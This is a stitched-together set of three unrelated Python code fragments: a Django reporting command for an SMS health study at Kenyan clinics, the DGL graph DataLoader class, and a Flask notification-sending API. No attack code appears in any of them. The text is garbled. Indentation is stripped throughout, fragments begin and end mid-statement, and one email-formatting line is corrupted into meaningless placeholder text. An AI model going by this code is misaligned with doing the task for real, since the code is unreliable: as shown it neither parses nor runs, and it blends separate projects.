'study_group','delivery_source').annotate(count=models.Count('delivery_source'))
# for g in source_groups:
# print g
# return
# Piviot Group Counts
source_counts = collections.defaultdict(DeliverySourceItem)
for g in source_groups:
source_counts[g['facility']][g['delivery_source']][g['study_group']] = g['count']
# Print Group Counts
self.stdout.write( DeliverySourceItem.header() )
total_row = DeliverySourceItem()
for facility, row in source_counts.items():
self.stdout.write( row.row_str(facility) )
total_row += row
self.stdout.write( total_row.row_str("Total") )
def print_enrollment(self):
self.print_header('Participant Enrollment By Week')
c_all = cont.Contact.objects.all()
enrollment_counts = collections.OrderedDict()
for c in c_all:
key = c.created.strftime('%Y-%U')
try:
enrollment_counts[key][c.facility] += 1
except KeyError as e:
enrollment_counts[key] = FacilityRow()
enrollment_counts[key][c.facility] += 1
self.stdout.write( "{:^12}{:^12}{:^12}{:^12}{:^12}{:^12}{:^12}{:^12}".format(
"Week","Ahero","Bondo","Mathare","Siaya","Rachuonyo","Riruta","Total") )
total_row = FacilityRow()
for week , enrollment in enrollment_counts.items():
print week, enrollment, enrollment.total()
total_row += enrollment
print 'Total ' , total_row , total_row.total()
def print_success_times(self):
self.print_header('Success Times')
participant_message_counts = cont.Contact.objects_no_link.annotate_messages().order_by('-msg_missed')[:13]
def display_phone_number(num):
participant = participant_message_counts[num-1]
return " |\t{!r:<40} O: {:<3} D: {:<3} M: {:<3} I: {:<3}".format(
participant,
participant.msg_outgoing,
participant.msg_delivered,
participant.msg_missed,
participant.msg_incoming
)
self.stdout.write('\n')
intervals = [
['',0],
['<10s',10],
['<30s',30],
['<1m',60],
['<5m',300],
['<10m',600],
['<30m',1800],
['<1h',3600],
['<2h',7200],
['<4h',14400],
['<8h',28800],
['<16h',57600],
['<24h',86400],
['>24h',604800]
]
# Add success_dt and filter messages from start of collection: Nov 30, 2016
messages = cont.Message.objects.exclude(external_status='Failed').add_success_dt()
for i in range(1,len(intervals)):
count = messages.filter(
success_dt__range=(intervals[i-1][1],intervals[i][1])
).count()
intervals[i].append(count)
self.stdout.write( ' {:>8}: {:<4}{:>15}'.format(
intervals[i][0],
count,
display_phone_number(i)
))
print "\tTotal (since Nov 30, 2016): {} Longest Wait: {} (h)".format(
messages.filter(success_dt__isnull=False).count(),
messages.first().success_dt/3600.0)
def print_sim_counts(self):
self.print_header('SIM Counts')
counts = collections.defaultdict(int)
for c in cont.Contact.objects_no_link.annotate_messages():
if c.sim_count <= 1:
continue
counts[c.study_group] += 1
print "{0.study_id} - {0.facility} - {0.study_group} - {1}: {0.msg_outgoing}-{0.msg_incoming}".format(c,c.created.date())
for conn in c.connection_set.all():
first_message = cont.Message.objects.filter(connection=conn).last()
print "{} - {} {}: {}-{}".format(
conn, conn.is_primary,
first_message.created.date() if first_message is not None else None,
cont.Message.objects.filter(connection=conn,is_outgoing=True).count(),
cont.Message.objects.filter(connection=conn,is_outgoing=False).count(),
)
print '-'*40 , '\n'
print counts
def print_message_status(self):
self.print_header('All Messages By Status')
# Print message status
print message_status_groups(delta=self.options['message_status'])
print "Other Types"
status_groups = cont.Message.objects.order_by().values('external_status'). \
exclude(external_status__in=('Success','Sent','Failed')).exclude(is_outgoing=False). \
annotate(count=models.Count('external_status'))
for group in status_groups:
print "\t{0[external_status]:<30}: {0[count]}".format(group)
print "\t{:<30}: {}".format("Total",sum( g['count'] for g in status_groups ) )
print "\nFailed Reasons"
reasons = collections.Counter()
for msg in cont.Message.objects.filter(is_outgoing=True).exclude(external_status__in=('Success','Sent')):
reasons[msg.external_data.get('reason','No Reason')] += 1
for reason , count in reasons.items():
print "\t{:<20}: {}".format(reason,count)
print "\t{:<20}: {}".format("Total",sum( reasons.values() ) )
def print_header(self,header):
if self.printed:
self.stdout.write("")
self.printed = True
self.stdout.write( "-"*30 )
self.stdout.write( "{:^30}".format(header) )
self.stdout.write( "-"*30 )
########################################
# SEC::Start CSV Functions
########################################
def make_connection_info_csv(self):
''' Basic csv dump of connection info '''
connections = cont.Connection.objects.filter(contact__isnull=False).order_by('contact__created')
file_path = os.path.join(self.options['dir'],'connections.csv')
csv_writer = csv.writer(open(file_path,'w'))
csv_writer.writerow( ['id','created','sims','group','facility','primary',
'first','last','total','participant','system','success','first_success','last_success'
])
for conn in connections:
total = conn.message_set.count()
row = [
conn.contact.study_id,
conn.contact.created.date(),
conn.contact.sim_count,
conn.contact.study_group,
conn.contact.facility,
1 if conn.is_primary is True else 0,
conn.message_set.last().created.date() if total > 0 else '' ,
conn.message_set.first().created.date() if total > 0 else '',
total,
conn.message_set.filter(is_outgoing=False).count(),
conn.message_set.filter(is_system=True).exclude(translation_status='cust').count(),
conn.message_set.filter(is_system=True,external_status='Success').exclude(translation_status='cust').count(),
sum(1 for m in conn.message_set.filter(is_system=True).exclude(translation_status='cust').order_by('created')[:5] if m.external_status == 'Success'),
sum(1 for m in conn.message_set.filter(is_system=True).exclude(translation_status='cust').order_by('-created')[:5] if m.external_status == 'Success'),
]
csv_writer.writerow(row)
return file_path
def make_sms_status_csv(self):
''' Basic csv dump of connection info '''
file_path = os.path.join(self.options['dir'],'sms_status.csv')
csv_writer = csv.writer(open(file_path,'w'))
status_keys = [
'Nurse','Participant','System', 'Spam',
'Success', 'Sent', 'Failed','None',
'AbsentSubscriber',
'UserDoesNotExist',
'DeliveryFailure',
'UserNotProvisioned',
'SystemFailure',
'Message Rejected By Gateway',
'RejectedByGateway',
'UserMTCallBarred',
'GatewayError',
'Rejected',
'Could Not Send',
'Unexpected Gateway Error',
'UserBusyForMTSms',
]
def get_default_row():
return {key:0 for key in status_keys}
weeks = collections.defaultdict(get_default_row)
def get_msg_week(msg):
created = msg.created.date()
return str(created - datetime.timedelta(days=created.isoweekday()%7))
messages = cont.Message.objects.all().prefetch_related('contact')
for msg in messages:
week = weeks[get_msg_week(msg)]
if msg.contact is None:
week['Spam'] += 1
elif msg.contact.study_group != 'two-way':
continue
elif msg.is_system:
week['System'] += 1
if msg.external_status in ['Success', 'Sent']:
week[msg.external_status] += 1
else:
week['Failed'] += 1
week[str(msg.reason)] += 1
elif msg.is_outgoing:
week['Nurse'] += 1
else:
week['Participant'] += 1
# Write header row
csv_writer.writerow( ['week'] + status_keys )
# write all weeks
for week in sorted(weeks.keys()):
csv_writer.writerow([week] + [weeks[week][key] for key in status_keys])
return file_path
def make_languages_csv(self):
file_path = os.path.join(self.options['dir'],'language_prefs.csv')
csv_writer = csv.writer(open(file_path,'w'))
contacts = cont.Contact.objects_no_link.annotate(
msgs_sent=utils.sql_count_when(message__is_outgoing=False),
msgs_system=utils.sql_count_when(message__is_system=True),
).order_by('facility','study_group','language','study_id')
def add_stats(c):
c.msgs_english , c.msgs_swahili, c.msgs_luo, c.msgs_sheng = 0 , 0 , 0 ,0
for m in c.message_set.all():
if 'english' in m.languages:
c.msgs_english += 1
if 'swahili' in m.languages:
c.msgs_swahili += 1
if 'luo' in m.languages:
c.msgs_luo += 1
if 'sheng' in m.languages:
c.msgs_sheng += 1
return c
columns = collections.OrderedDict([
('study_id','study_id'),
('facility','facility'),
('study_group','study_group'),
('language','language'),
('msgs_sent','msgs_sent'),
('msgs_system','msgs_system'),
('msgs_english','msgs_english'),
('msgs_swahili','msgs_swahili'),
('msgs_luo','msgs_luo'),
('msgs_sheng','msgs_sheng'),
])
make_csv(columns,[add_stats(c) for c in contacts],file_path)
return file_path
def make_hiv_messaging_csv(self):
''' Basic csv dump of hiv messaging status '''
columns = collections.OrderedDict([
('study_id','study_id'),
('status','status'),
('hiv_messaging','hiv_messaging'),
('hiv_disclosed', null_boolean_factory('hiv_disclosed')),
| |
a single-GPU and
the whole graph fits in GPU memory.
* If the input graph :attr:`g` is on CPU while the output device :attr:`device` is GPU, then
depending on the value of :attr:`use_uva`:
- If :attr:`use_uva` is set to True, the sampling and subgraph construction will happen
on GPU even if the GPU itself cannot hold the entire graph. This is the recommended
setting unless there are operations not supporting UVA. :attr:`num_workers` must be 0
in this case.
- Otherwise, both the sampling and subgraph construction will take place on the CPU.
"""
def __init__(self, graph, indices, graph_sampler, device=None, use_ddp=False,
ddp_seed=0, batch_size=1, drop_last=False, shuffle=False,
use_prefetch_thread=None, use_alternate_streams=None,
pin_prefetcher=None, use_uva=False,
use_cpu_worker_affinity=False, cpu_worker_affinity_cores=None, **kwargs):
# (BarclayII) PyTorch Lightning sometimes will recreate a DataLoader from an existing
# DataLoader with modifications to the original arguments. The arguments are retrieved
# from the attributes with the same name, and because we change certain arguments
# when calling super().__init__() (e.g. batch_size attribute is None even if the
# batch_size argument is not, so the next DataLoader's batch_size argument will be
# None), we cannot reinitialize the DataLoader with attributes from the previous
# DataLoader directly.
# A workaround is to check whether "collate_fn" appears in kwargs. If "collate_fn"
# is indeed in kwargs and it's already a CollateWrapper object, we can assume that
# the arguments come from a previously created DGL DataLoader, and directly initialize
# the new DataLoader from kwargs without any changes.
if isinstance(kwargs.get('collate_fn', None), CollateWrapper):
assert batch_size is None # must be None
# restore attributes
self.graph = graph
self.indices = indices
self.graph_sampler = graph_sampler
self.device = device
self.use_ddp = use_ddp
self.ddp_seed = ddp_seed
self.shuffle = shuffle
self.drop_last = drop_last
self.use_prefetch_thread = use_prefetch_thread
self.use_alternate_streams = use_alternate_streams
self.pin_prefetcher = pin_prefetcher
self.use_uva = use_uva
kwargs['batch_size'] = None
super().__init__(**kwargs)
return
if isinstance(graph, DistGraph):
raise TypeError(
'Please use dgl.dataloading.DistNodeDataLoader or '
'dgl.datalaoding.DistEdgeDataLoader for DistGraphs.')
# (BarclayII) I hoped that pin_prefetcher can be merged into PyTorch's native
# pin_memory argument. But our neighbor samplers and subgraph samplers
# return indices, which could be CUDA tensors (e.g. during UVA sampling)
# hence cannot be pinned. PyTorch's native pin memory thread does not ignore
# CUDA tensors when pinning and will crash. To enable pin memory for prefetching
# features and disable pin memory for sampler's return value, I had to use
# a different argument. Of course I could change the meaning of pin_memory
# to pinning prefetched features and disable pin memory for sampler's returns
# no matter what, but I doubt if it's reasonable.
self.graph = graph
self.indices = indices # For PyTorch-Lightning
num_workers = kwargs.get('num_workers', 0)
indices_device = None
try:
if isinstance(indices, Mapping):
indices = {k: (torch.tensor(v) if not torch.is_tensor(v) else v)
for k, v in indices.items()}
indices_device = next(iter(indices.values())).device
else:
indices = torch.tensor(indices) if not torch.is_tensor(indices) else indices
indices_device = indices.device
except: # pylint: disable=bare-except
# ignore when it fails to convert to torch Tensors.
pass
if indices_device is None:
if not hasattr(indices, 'device'):
raise AttributeError('Custom indices dataset requires a \"device\" \
attribute indicating where the indices is.')
indices_device = indices.device
if device is None:
if use_uva:
device = torch.cuda.current_device()
else:
device = self.graph.device
self.device = _get_device(device)
# Sanity check - we only check for DGLGraphs.
if isinstance(self.graph, DGLHeteroGraph):
# Check graph and indices device as well as num_workers
if use_uva:
if self.graph.device.type != 'cpu':
raise ValueError('Graph must be on CPU if UVA sampling is enabled.')
if num_workers > 0:
raise ValueError('num_workers must be 0 if UVA sampling is enabled.')
# Create all the formats and pin the features - custom GraphStorages
# will need to do that themselves.
self.graph.create_formats_()
self.graph.pin_memory_()
else:
if self.graph.device != indices_device:
raise ValueError(
'Expect graph and indices to be on the same device. '
'If you wish to use UVA sampling, please set use_uva=True.')
if self.graph.device.type == 'cuda' and num_workers > 0:
raise ValueError('num_workers must be 0 if graph and indices are on CUDA.')
if self.graph.device.type == 'cpu' and num_workers > 0:
# Instantiate all the formats if the number of workers is greater than 0.
self.graph.create_formats_()
# Check pin_prefetcher and use_prefetch_thread - should be only effective
# if performing CPU sampling but output device is CUDA
if self.device.type == 'cuda' and self.graph.device.type == 'cpu' and not use_uva:
if pin_prefetcher is None:
pin_prefetcher = True
if use_prefetch_thread is None:
use_prefetch_thread = True
else:
if pin_prefetcher is True:
raise ValueError(
'pin_prefetcher=True is only effective when device=cuda and '
'sampling is performed on CPU.')
if pin_prefetcher is None:
pin_prefetcher = False
if use_prefetch_thread is True:
raise ValueError(
'use_prefetch_thread=True is only effective when device=cuda and '
'sampling is performed on CPU.')
if use_prefetch_thread is None:
use_prefetch_thread = False
# Check use_alternate_streams
if use_alternate_streams is None:
use_alternate_streams = (
self.device.type == 'cuda' and self.graph.device.type == 'cpu' and
not use_uva)
if (torch.is_tensor(indices) or (
isinstance(indices, Mapping) and
all(torch.is_tensor(v) for v in indices.values()))):
self.dataset = create_tensorized_dataset(
indices, batch_size, drop_last, use_ddp, ddp_seed)
else:
self.dataset = indices
self.ddp_seed = ddp_seed
self.use_ddp = use_ddp
self.use_uva = use_uva
self.shuffle = shuffle
self.drop_last = drop_last
self.graph_sampler = graph_sampler
self.use_alternate_streams = use_alternate_streams
self.pin_prefetcher = pin_prefetcher
self.use_prefetch_thread = use_prefetch_thread
worker_init_fn = WorkerInitWrapper(kwargs.get('worker_init_fn', None))
self.other_storages = {}
if use_cpu_worker_affinity:
nw_work = kwargs.get('num_workers', 0)
if cpu_worker_affinity_cores is None:
cpu_worker_affinity_cores = []
if not isinstance(cpu_worker_affinity_cores, list):
raise Exception('ERROR: cpu_worker_affinity_cores should be a list of cores')
if not nw_work > 0:
raise Exception('ERROR: affinity should be used with --num_workers=X')
if len(cpu_worker_affinity_cores) not in [0, nw_work]:
raise Exception('ERROR: cpu_affinity incorrect '
'settings for cores={} num_workers={}'
.format(cpu_worker_affinity_cores, nw_work))
self.cpu_cores = (cpu_worker_affinity_cores
if len(cpu_worker_affinity_cores)
else range(0, nw_work))
worker_init_fn = WorkerInitWrapper(self.worker_init_function)
super().__init__(
self.dataset,
collate_fn=CollateWrapper(
self.graph_sampler.sample, graph, self.use_uva, self.device),
batch_size=None,
worker_init_fn=worker_init_fn,
**kwargs)
def __iter__(self):
if self.shuffle:
self.dataset.shuffle()
# When using multiprocessing PyTorch sometimes set the number of PyTorch threads to 1
# when spawning new Python threads. This drastically slows down pinning features.
num_threads = torch.get_num_threads() if self.num_workers > 0 else None
return _PrefetchingIter(
self, super().__iter__(), use_thread=self.use_prefetch_thread,
use_alternate_streams=self.use_alternate_streams, num_threads=num_threads)
def worker_init_function(self, worker_id):
"""Worker init default function.
Parameters
----------
worker_id : int
Worker ID.
"""
try:
psutil.Process().cpu_affinity([self.cpu_cores[worker_id]])
print('CPU-affinity worker {} has been assigned to core={}'
.format(worker_id, self.cpu_cores[worker_id]))
except:
raise Exception('ERROR: cannot use affinity id={} cpu_cores={}'
.format(worker_id, self.cpu_cores))
# To allow data other than node/edge data to be prefetched.
def attach_data(self, name, data):
"""Add a data other than node and edge features for prefetching."""
self.other_storages[name] = wrap_storage(data)
# Alias
class NodeDataLoader(DataLoader):
"""(DEPRECATED) Sampled graph data loader over a set of nodes.
.. deprecated:: 0.8
The class is deprecated since v0.8, replaced by :class:`~dgl.dataloading.DataLoader`.
"""
class EdgeDataLoader(DataLoader):
"""(DEPRECATED) Sampled graph data loader over a set of edges.
.. deprecated:: 0.8
The class is deprecated since v0.8 -- its function has been covered by
:class:`~dgl.dataloading.DataLoader` and :func:`~dgl.as_edge_prediction_sampler`.
To migrate, change the legacy usage like:
.. code:: python
sampler = dgl.dataloading.MultiLayerNeighborSampler([15, 10, 5])
dataloader = dgl.dataloading.EdgeDataLoader(
g, train_eid, sampler, exclude='reverse_id',
reverse_eids=reverse_eids,
negative_sampler=dgl.dataloading.negative_sampler.Uniform(5),
batch_size=1024, shuffle=True, drop_last=False, num_workers=4)
to:
.. code:: python
sampler = dgl.dataloading.MultiLayerNeighborSampler([15, 10, 5])
sampler = dgl.dataloading.as_edge_prediction_sampler(
sampler, exclude='reverse_id',
reverse_eids=reverse_eids,
negative_sampler=dgl.dataloading.negative_sampler.Uniform(5))
dataloader = dgl.dataloading.DataLoader(
g, train_eid, sampler,
batch_size=1024, shuffle=True, drop_last=False, num_workers=4)
"""
def __init__(self, graph, indices, graph_sampler, device=None, use_ddp=False,
ddp_seed=0, batch_size=1, drop_last=False, shuffle=False,
use_prefetch_thread=False, use_alternate_streams=True,
pin_prefetcher=False,
exclude=None, reverse_eids=None, reverse_etypes=None, negative_sampler=None,
use_uva=False, **kwargs):
if device is None:
if use_uva:
device = torch.cuda.current_device()
else:
device = self.graph.device
device = _get_device(device)
if isinstance(graph_sampler, BlockSampler):
dgl_warning(
'EdgeDataLoader directly taking a BlockSampler will be deprecated '
'and it will not support feature prefetching. '
'Please use dgl.dataloading.as_edge_prediction_sampler to wrap it.')
if reverse_eids is not None:
if use_uva:
reverse_eids = recursive_apply(reverse_eids, lambda x: x.to(device))
else:
reverse_eids_device = context_of(reverse_eids)
indices_device = context_of(indices)
if indices_device != reverse_eids_device:
raise ValueError('Expect the same device for indices and reverse_eids')
graph_sampler = as_edge_prediction_sampler(
graph_sampler, exclude=exclude, reverse_eids=reverse_eids,
reverse_etypes=reverse_etypes, negative_sampler=negative_sampler)
super().__init__(
graph, indices, graph_sampler, device=device, use_ddp=use_ddp, ddp_seed=ddp_seed,
batch_size=batch_size, drop_last=drop_last, shuffle=shuffle,
use_prefetch_thread=use_prefetch_thread, use_alternate_streams=use_alternate_streams,
pin_prefetcher=pin_prefetcher, use_uva=use_uva,
**kwargs)
######## Graph DataLoaders ########
# GraphDataLoader loads a set of graphs so it's not relevant to the above. They | |
import base64
import csv
import functools
import uuid
from io import StringIO
import werkzeug
from flask import abort, current_app, jsonify, request
from notifications_utils.recipients import (
RecipientCSV,
try_validate_and_format_phone_number,
)
from app import (
api_user,
authenticated_service,
create_uuid,
document_download_client,
encryption,
notify_celery,
statsd_client,
)
from app.aws.s3 import upload_job_to_s3
from app.celery.letters_pdf_tasks import create_letters_pdf, process_virus_scan_passed
from app.celery.research_mode_tasks import create_fake_letter_response_file
from app.celery.tasks import process_job, save_email, save_sms
from app.clients.document_download import DocumentDownloadError
from app.config import QueueNames, TaskNames
from app.dao.jobs_dao import dao_create_job
from app.dao.notifications_dao import update_notification_status_by_reference
from app.dao.services_dao import fetch_todays_total_message_count
from app.dao.templates_dao import get_precompiled_letter_template
from app.letters.utils import upload_letter_pdf
from app.models import (
EMAIL_TYPE,
JOB_STATUS_PENDING,
JOB_STATUS_SCHEDULED,
KEY_TYPE_TEAM,
KEY_TYPE_TEST,
LETTER_TYPE,
NOTIFICATION_CREATED,
NOTIFICATION_DELIVERED,
NOTIFICATION_PENDING_VIRUS_CHECK,
NOTIFICATION_SENDING,
SMS_TYPE,
UPLOAD_DOCUMENT,
Notification,
)
from app.notifications.process_letter_notifications import create_letter_notification
from app.notifications.process_notifications import (
persist_notification,
persist_scheduled_notification,
send_notification_to_queue,
simulated_recipient,
)
from app.notifications.validators import (
check_rate_limiting,
check_service_can_schedule_notification,
check_service_email_reply_to_id,
check_service_has_permission,
check_service_sms_sender_id,
validate_and_format_recipient,
validate_template,
validate_template_exists,
)
from app.schema_validation import validate
from app.schemas import job_schema
from app.service.utils import safelisted_members
from app.v2.errors import BadRequestError
from app.v2.notifications import v2_notification_blueprint
from app.v2.notifications.create_response import (
create_post_email_response_from_notification,
create_post_letter_response_from_notification,
create_post_sms_response_from_notification,
)
from app.v2.notifications.notification_schemas import (
post_bulk_request,
post_email_request,
post_letter_request,
post_precompiled_letter_request,
post_sms_request,
)
@v2_notification_blueprint.route("/{}".format(LETTER_TYPE), methods=["POST"])
def post_precompiled_letter_notification():
if "content" not in (request.get_json() or {}):
return post_notification(LETTER_TYPE)
form = validate(request.get_json(), post_precompiled_letter_request)
# Check permission to send letters
check_service_has_permission(LETTER_TYPE, authenticated_service.permissions)
check_rate_limiting(authenticated_service, api_user)
template = get_precompiled_letter_template(authenticated_service.id)
form["personalisation"] = {"address_line_1": form["reference"]}
reply_to = get_reply_to_text(LETTER_TYPE, form, template)
notification = process_letter_notification(
letter_data=form,
api_key=api_user,
template=template,
reply_to_text=reply_to,
precompiled=True,
)
resp = {
"id": notification.id,
"reference": notification.client_reference,
"postage": notification.postage,
}
return jsonify(resp), 201
@v2_notification_blueprint.route("/bulk", methods=["POST"])
def post_bulk():
try:
request_json = request.get_json()
except werkzeug.exceptions.BadRequest as e:
raise BadRequestError(message=f"Error decoding arguments: {e.description}", status_code=400)
max_rows = current_app.config["CSV_MAX_ROWS"]
form = validate(request_json, post_bulk_request(max_rows))
if len([source for source in [form.get("rows"), form.get("csv")] if source]) != 1:
raise BadRequestError(message="You should specify either rows or csv", status_code=400)
template = validate_template_exists(form["template_id"], authenticated_service)
check_service_has_permission(template.template_type, authenticated_service.permissions)
remaining_messages = authenticated_service.message_limit - fetch_todays_total_message_count(authenticated_service.id)
form["validated_sender_id"] = validate_sender_id(template, form.get("reply_to_id"))
try:
if form.get("rows"):
output = StringIO()
writer = csv.writer(output)
writer.writerows(form["rows"])
file_data = output.getvalue()
else:
file_data = form["csv"]
recipient_csv = RecipientCSV(
file_data,
template_type=template.template_type,
placeholders=template._as_utils_template().placeholders,
max_rows=max_rows,
safelist=safelisted_members(authenticated_service, api_user.key_type),
remaining_messages=remaining_messages,
)
except csv.Error as e:
raise BadRequestError(message=f"Error converting to CSV: {str(e)}", status_code=400)
check_for_csv_errors(recipient_csv, max_rows, remaining_messages)
job = create_bulk_job(authenticated_service, api_user, template, form, recipient_csv)
return jsonify(data=job_schema.dump(job).data), 201
@v2_notification_blueprint.route("/<notification_type>", methods=["POST"])
def post_notification(notification_type):
try:
request_json = request.get_json()
except werkzeug.exceptions.BadRequest as e:
raise BadRequestError(
message="Error decoding arguments: {}".format(e.description),
status_code=400,
)
if notification_type == EMAIL_TYPE:
form = validate(request_json, post_email_request)
elif notification_type == SMS_TYPE:
form = validate(request_json, post_sms_request)
elif notification_type == LETTER_TYPE:
form = validate(request_json, post_letter_request)
else:
abort(404)
check_service_has_permission(notification_type, authenticated_service.permissions)
scheduled_for = form.get("scheduled_for", None)
check_service_can_schedule_notification(authenticated_service.permissions, scheduled_for)
check_rate_limiting(authenticated_service, api_user)
template, template_with_content = validate_template(
form["template_id"],
strip_keys_from_personalisation_if_send_attach(form.get("personalisation", {})),
authenticated_service,
notification_type,
)
reply_to = get_reply_to_text(notification_type, form, template)
if notification_type == LETTER_TYPE:
notification = process_letter_notification(
letter_data=form,
api_key=api_user,
template=template,
reply_to_text=reply_to,
)
else:
notification = process_sms_or_email_notification(
form=form,
notification_type=notification_type,
api_key=api_user,
template=template,
service=authenticated_service,
reply_to_text=reply_to,
)
template_with_content.values = notification.personalisation
if notification_type == SMS_TYPE:
create_resp_partial = functools.partial(create_post_sms_response_from_notification, from_number=reply_to)
elif notification_type == EMAIL_TYPE:
if authenticated_service.sending_domain is None or authenticated_service.sending_domain.strip() == "":
sending_domain = current_app.config["NOTIFY_EMAIL_DOMAIN"]
else:
sending_domain = authenticated_service.sending_domain
create_resp_partial = functools.partial(
create_post_email_response_from_notification,
subject=template_with_content.subject,
email_from="{}<EMAIL>(authenticated_<EMAIL>, sending_domain),
)
elif notification_type == LETTER_TYPE:
create_resp_partial = functools.partial(
create_post_letter_response_from_notification,
subject=template_with_content.subject,
)
resp = create_resp_partial(
notification=notification,
content=str(template_with_content),
url_root=request.url_root,
scheduled_for=scheduled_for,
)
return jsonify(resp), 201
def process_sms_or_email_notification(*, form, notification_type, api_key, template, service, reply_to_text=None):
form_send_to = form["email_address"] if notification_type == EMAIL_TYPE else form["phone_number"]
send_to = validate_and_format_recipient(
send_to=form_send_to,
key_type=api_key.key_type,
service=service,
notification_type=notification_type,
)
# Do not persist or send notification to the queue if it is a simulated recipient
simulated = simulated_recipient(send_to, notification_type)
personalisation = process_document_uploads(form.get("personalisation"), service, simulated, template.id)
notification = {
"id": create_uuid(),
"template": str(template.id),
"template_version": str(template.version),
"to": form_send_to,
"personalisation": personalisation,
"simulated": simulated,
"api_key": str(api_key.id),
"key_type": str(api_key.key_type),
"client_reference": form.get("reference", None),
}
encrypted_notification_data = encryption.encrypt(notification)
scheduled_for = form.get("scheduled_for", None)
if scheduled_for:
notification = persist_notification(
template_id=template.id,
template_version=template.version,
recipient=form_send_to,
service=service,
personalisation=personalisation,
notification_type=notification_type,
api_key_id=api_key.id,
key_type=api_key.key_type,
client_reference=form.get("reference", None),
simulated=simulated,
reply_to_text=reply_to_text,
)
persist_scheduled_notification(notification.id, form["scheduled_for"])
elif current_app.config["FF_NOTIFICATION_CELERY_PERSISTENCE"] and not simulated:
# depending on the type route to the appropriate save task
if notification_type == EMAIL_TYPE:
current_app.logger.info("calling save email task")
save_email.apply_async(
(authenticated_service.id, create_uuid(), encrypted_notification_data, None),
queue=QueueNames.DATABASE if not authenticated_service.research_mode else QueueNames.RESEARCH_MODE,
)
elif notification_type == SMS_TYPE:
save_sms.apply_async(
(authenticated_service.id, create_uuid(), encrypted_notification_data, None),
queue=QueueNames.DATABASE if not authenticated_service.research_mode else QueueNames.RESEARCH_MODE,
)
else:
notification = persist_notification(
template_id=template.id,
template_version=template.version,
recipient=form_send_to,
service=service,
personalisation=personalisation,
notification_type=notification_type,
api_key_id=api_key.id,
key_type=api_key.key_type,
client_reference=form.get("reference", None),
simulated=simulated,
reply_to_text=reply_to_text,
)
if not simulated:
send_notification_to_queue(
notification=notification,
research_mode=service.research_mode,
queue=template.queue_to_use(),
)
else:
current_app.logger.debug("POST simulated notification for id: {}".format(notification.id))
if not isinstance(notification, Notification):
notification["template_id"] = notification["template"]
notification["api_key_id"] = notification["api_key"]
notification["template_version"] = template.version
notification["service"] = service
notification["service_id"] = service.id
notification["reply_to_text"] = reply_to_text
del notification["template"]
del notification["api_key"]
del notification["simulated"]
notification = Notification(**notification)
return notification
def process_document_uploads(personalisation_data, service, simulated, template_id):
file_keys = [k for k, v in (personalisation_data or {}).items() if isinstance(v, dict) and "file" in v]
if not file_keys:
return personalisation_data
personalisation_data = personalisation_data.copy()
check_service_has_permission(UPLOAD_DOCUMENT, authenticated_service.permissions)
for key in file_keys:
if simulated:
personalisation_data[key] = document_download_client.get_upload_url(service.id) + "/test-document"
else:
try:
personalisation_data[key] = document_download_client.upload_document(service.id, personalisation_data[key])
except DocumentDownloadError as e:
raise BadRequestError(message=e.message, status_code=e.status_code)
if not simulated:
save_stats_for_attachments(
[v for k, v in personalisation_data.items() if k in file_keys],
service.id,
template_id,
)
return personalisation_data
def save_stats_for_attachments(files_data, service_id, template_id):
nb_files = len(files_data)
statsd_client.incr(f"attachments.nb-attachments.count-{nb_files}")
statsd_client.incr("attachments.nb-attachments", count=nb_files)
statsd_client.incr(f"attachments.services.{service_id}", count=nb_files)
statsd_client.incr(f"attachments.templates.{template_id}", count=nb_files)
for document in [f["document"] for f in files_data]:
statsd_client.incr(f"attachments.sending-method.{document['sending_method']}")
statsd_client.incr(f"attachments.file-type.{document['mime_type']}")
# File size is in bytes, convert to whole megabytes
nb_mb = document["file_size"] // (1_024 * 1_024)
file_size_bucket = f"{nb_mb}-{nb_mb + 1}mb"
statsd_client.incr(f"attachments.file-size.{file_size_bucket}")
def process_letter_notification(*, letter_data, api_key, template, reply_to_text, precompiled=False):
if api_key.key_type == KEY_TYPE_TEAM:
raise BadRequestError(message="Cannot send letters with a team api key", status_code=403)
if not api_key.service.research_mode and api_key.service.restricted and api_key.key_type != KEY_TYPE_TEST:
raise BadRequestError(message="Cannot send letters when service is in trial mode", status_code=403)
if precompiled:
return process_precompiled_letter_notifications(
letter_data=letter_data,
api_key=api_key,
template=template,
reply_to_text=reply_to_text,
)
test_key = api_key.key_type == KEY_TYPE_TEST
# if we don't want to actually send the letter, then start it off in SENDING so we don't pick it up
status = NOTIFICATION_CREATED if not test_key else NOTIFICATION_SENDING
queue = QueueNames.CREATE_LETTERS_PDF if not test_key else QueueNames.RESEARCH_MODE
notification = create_letter_notification(
letter_data=letter_data,
template=template,
api_key=api_key,
status=status,
reply_to_text=reply_to_text,
)
create_letters_pdf.apply_async([str(notification.id)], queue=queue)
if test_key:
if current_app.config["NOTIFY_ENVIRONMENT"] in ["preview", "development"]:
create_fake_letter_response_file.apply_async((notification.reference,), queue=queue)
else:
update_notification_status_by_reference(notification.reference, NOTIFICATION_DELIVERED)
return notification
def process_precompiled_letter_notifications(*, letter_data, api_key, template, reply_to_text):
try:
status = NOTIFICATION_PENDING_VIRUS_CHECK
letter_content = base64.b64decode(letter_data["content"])
except ValueError:
raise BadRequestError(
message="Cannot decode letter content (invalid base64 encoding)",
status_code=400,
)
notification = create_letter_notification(
letter_data=letter_data,
template=template,
api_key=api_key,
status=status,
reply_to_text=reply_to_text,
)
filename = upload_letter_pdf(notification, letter_content, precompiled=True)
current_app.logger.info("Calling task scan-file for {}".format(filename))
# call task to add the filename to anti virus queue
if current_app.config["ANTIVIRUS_ENABLED"]:
notify_celery.send_task(
name=TaskNames.SCAN_FILE,
kwargs={"filename": filename},
queue=QueueNames.ANTIVIRUS,
)
else:
# stub out antivirus in dev
process_virus_scan_passed.apply_async(
kwargs={"filename": filename},
queue=QueueNames.LETTERS,
)
return notification
def validate_sender_id(template, reply_to_id):
notification_type = template.template_type
if notification_type == EMAIL_TYPE:
service_email_reply_to_id = reply_to_id
check_service_email_reply_to_id(
str(authenticated_service.id),
service_email_reply_to_id,
notification_type,
)
return service_email_reply_to_id
elif notification_type == SMS_TYPE:
service_sms_sender_id = reply_to_id
check_service_sms_sender_id(
str(authenticated_service.id),
service_sms_sender_id,
notification_type,
)
return service_sms_sender_id
else:
raise NotImplementedError("validate_sender_id only handles emails and text messages")
def get_reply_to_text(notification_type, form, template, form_field=None):
reply_to = None
if notification_type == EMAIL_TYPE:
service_email_reply_to_id = form.get(form_field or "email_reply_to_id")
reply_to = (
check_service_email_reply_to_id(
str(authenticated_service.id),
service_email_reply_to_id,
notification_type,
)
or template.get_reply_to_text()
)
elif notification_type == SMS_TYPE:
service_sms_sender_id = form.get(form_field or "sms_sender_id")
sms_sender_id = check_service_sms_sender_id(str(authenticated_service.id), service_sms_sender_id, notification_type)
